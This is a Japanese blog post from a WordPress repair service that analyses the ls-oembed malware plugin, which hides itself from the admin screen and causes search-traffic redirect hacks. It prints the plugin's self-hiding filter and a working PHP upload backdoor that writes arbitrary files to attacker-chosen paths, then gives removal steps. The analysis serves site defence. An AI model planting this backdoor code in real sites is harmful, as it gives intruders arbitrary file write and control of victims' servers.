最近多数のお客様から同様のマルウェア被害についてのご相談が寄せられ、ワードプレスドクターで修正させていただいておりますのでこちらのマルウェアの排除の依頼事例についてご紹介させていただきます。
こちらの事例では共通して ls-oembedというプラグインが知らず知らずのうちにインストールされバックドアとなっているという共通点がございます。

検索エンジン経由のアクセスがすべて海外サイトにリダイレクトされアクセス数が激減

クライアント様のご相談内容としては、アクセス数が突然激減し、どうやら検索エンジン経由の流入がすべてどこか別のサイトにリダイレクト(強制的に別のサイトへユーザーが誘導される)されているという内容でございました。
このような、ハッキングのタイプをリダイレクトハックといい、別のサイトにトラフィックを不正に送ることによってハッカーが金銭的な対価を得るために仕込まれているものです。

参考記事
WordPress ワードプレスが勝手に別サイトにリダイレクトされるリダイレクトハックの事例と対処方法

ls-oembedプラグインがいつの間にかインストールされている

最近の多くのお客様に共通しているのが、 ls-oembedという不正なプラグインがプラグインフォルダに入っているということです。しかし、このプラグインは管理画面には表示されないようになっており、管理者にはそれがインストールされているかがわからなくなっています。
もし、FTP接続などでプラグインフォルダにこのプラグインがある場合は、サイトのクリーンアップをされることをお勧めいたします。

プラグインの中身のコードを見ていきましょう。

//скрываем плагины от всех кроме главного админа start
function SECURITYFIREWALL_hide($plugins) {
    if( $_GET[SECURITYFIREWALL__ADMIN_LOGIN] == 1 ) {
        return $plugins;
    }
    $user = wp_get_current_user();
    if( $user->data->user_login === SECURITYFIREWALL__ADMIN_LOGIN ) {
        return $plugins;
    }
    if( is_plugin_active( SECURITYFIREWALL__PLUGIN ) ) {
        unset( $plugins[ SECURITYFIREWALL__PLUGIN ] );
    }
    return $plugins;
}
add_filter('all_plugins', 'SECURITYFIREWALL_hide');

このコードは、プラグイン関数の一部です。この関数でプラグインが管理画面に現れないようになっています。ロシア語が含まれていることから、ロシア製のマルウェアの可能性があるといえます。

プラグインに含まれるバックドア生成機能

またこのプラグインはワードプレスのアップロードフォルダに下記のコードを書き出す機能を有します。

if (isset($_POST['upload'])){
	if ($_POST['upload']=='1'){
		$uploadfile = $_POST['path'].$_FILES['uploadfile']['name'];
		if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile))
			{echo 'ok';}
		else {echo $_FILES['uploadfile']['error'];}
		}
	if ($_POST['upload']=='2'){
		$fp=fopen($_POST['path'],'a');  
		fwrite($fp, "\r\n");
		fwrite($fp, $_POST['uploadfile']);
		fclose($fp);
		echo 'ok';
		}
	}
else {header('Location: ../../');}

このコードは、いかなるファイルもワードプレスのディレクトリに無断で設置できるバックドアのコードです。
弊社ご依頼のお客様では、wpcsesapps.phpという名称でwp-contentフォルダにこのコードがコピーされて生成されていることが多かったです。

マルウェアls-oembedプラグインの対処方法

このマルウェアはバックドアの機能を有するため、一旦感染してしまうとそのバックドア経由で自由にファイルが読み書きできてしまうため、専門家によるウェブサイト全体のマルウェア駆除も行う必要がございますが、より大きな改ざんをウェブサイトに受けないためには下記のような方法でとりあえずバックドアを排除することは可能です。
●FTPソフトウェアなどでwp-content\plugins フォルダに接続しls-oembedというフォルダがないかお確かめください。(ある場合はフォルダを削除されてください)
●プラグインが書き出したバックドアは、多くの場合wp-contentフォルダにwpcsesapps.phpという名称で設置されていました。こちらもある場合は削除されてください。

ワードプレスドクターのセキュリティー関連プログラム
ワードプレスドクター脆弱性チェッカー
[無料]WordPressの改ざん、ハッキング、マルウェア、ウィルスをスキャン(検出) WP malware scanner LITE(今回のマルウェアの定義導入済み)

WordPress に入れた覚えのないプラグインがあったり、サイトがリダイレクトされてしまうなどのマルウェア被害が考えられましたら、ワードプレスドクターにお気軽にご相談ください

関連記事:

  1. ワードプレスのマルウェア・リダイレクトハックの手法の分析
    ワードプレスドクターが復旧してきたマルウェア改ざんを受けているサイト様で、最近特に多くのサイト様が被害を受けているリダイレクトハック(サイトがアクセスしてきたユーザーが中国のサイトやセキュリティーサイト等に勝手に誘導されてしまうサイトの改ざん)がどのようなコードになっていて、そのコードがサイトにどのように作用しているのかを解説したく思います。...
  2. ワードプレス改ざんの復旧:5000件以上のハッキングされたワードプレスサイトのリストを発見
    ワードプレスドクターのセキュリティー対策室にて、お客様のハッキング被害を修復する過程で、弊社では5000件以上のハッキングされたワードプレスサイトのURLを発見いたしました。この度はこの依頼事例からハッキングされたサイトリストを取得するに至った、顛末をご報告したく思います。 同一の手法による改ざん被害で、一度に発見されたワードプレスサイトの被害規模としては世界最大クラスかと存じますので公益性が高いかと考えまして事例を記載いたします。...
  3. ワードプレス WEBバックドアとは?その危険性や手法を解説いたします
    バックドアとは コンピュータセキュリティ用語としてのいわゆるバックドアは、本来はIDやパスワードを使って使用権を確認するコンピュータの機能を無許可で利用するために、コンピュータ内に(他人に知られることなく)設けられた通信接続の機能を指す。 引用 Wikipedia...
  4. ワードプレスにおけるプログラムの脆弱性とは?
    ワードプレスやプラグインで脆弱性をふさぐためにアップデートが必要と言われますが、それでは脆弱性とは何なのかにつきまして最も危険なタイプの脆弱性について解説いたします。...
  5. ワードプレスがハッキング・改ざん・乗っ取りされた際にユーザー向けに行うべきこと
    ワードプレスが改ざんされて、別のサイトにリダイレクトされる、懸賞サイトに飛ばされる、不正なファイルのダウンロードをされる等、サイトに訪ねてくれたユーザーに被害が及ぶ可能性がある場合にユーザー向け(サイトを利用してくれる方)にどのように対応したらよいかを解説いたします。...
  6. ワードプレスドクター 依頼事例:一瞬で再度改ざん(書き換わる)される.htaccessとindex.phpのマルウェア駆除
    最近非常にご相談が増えている「一瞬で再度改ざん(書き換わる)される.htaccessとindex.php」タイプのマルウェアを駆除代行させていただきました事例をご紹介いたします。...